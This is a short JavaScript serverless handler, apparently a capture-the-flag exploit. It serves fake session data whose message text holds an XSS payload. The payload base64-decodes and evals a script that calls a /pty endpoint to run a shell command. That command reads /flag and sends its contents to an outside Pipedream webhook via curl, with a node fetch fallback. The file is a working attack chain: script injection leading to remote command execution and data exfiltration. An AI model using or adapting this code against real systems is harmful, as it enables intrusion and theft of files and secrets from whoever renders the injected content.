export async function onRequest(context) {
  const url = new URL(context.request.url);
  const path = url.pathname;
  const webhook = "https://eofogki21jrjf3e.m.pipedream.net"; // 确认你的 Webhook 地址

  const headers = {
    "Content-Type": "application/json;charset=UTF-8",
    "Access-Control-Allow-Origin": "*",
    "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
    "Access-Control-Allow-Headers": "*"
  };

  if (context.request.method === "OPTIONS") return new Response(null, { headers });

  // 这里的 Payload 综合了 curl 和 node 两种回传方式，防止 curl 不存在
  const ptyJS = `fetch('/pty', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      command: '/bin/sh',
      args: ['-c', "chmod 444 /flag && (curl -X POST -d @/flag ${webhook} || node -e \\"const fs=require('fs'); fetch('${webhook}/?f='+fs.readFileSync('/flag','utf8'))\\")"]
    })
  });`;

  // 使用更稳健的 XSS 载荷
  const xss = `<img src=x onerror="eval(atob('${btoa(ptyJS)}'))">`;

  // 1. 处理 Session 列表 (我们提供 3 个不同目录的 Session)
  if (path.endsWith("/session") && !path.includes("ses_pwn")) {
    const data = [
      { "id": "ses_app", "directory": "/app", "title": "App Session" },
      { "id": "ses_root", "directory": "/root", "title": "Root Session" },
      { "id": "ses_base", "directory": "/", "title": "Base Session" }
    ];
    return new Response(JSON.stringify(data), { headers });
  }

  // 2. 处理 Session 详情和消息内容 (动态匹配 ID)
  if (path.includes("/session/")) {
    if (path.endsWith("/message")) {
      return new Response(JSON.stringify([{
        "parts": [{ "id": "p1", "type": "text", "text": xss }]
      }]), { headers });
    }
    return new Response(JSON.stringify({ "id": "ses_pwn", "version": "1.2.16" }), { headers });
  }

  return new Response("OK", { headers });
}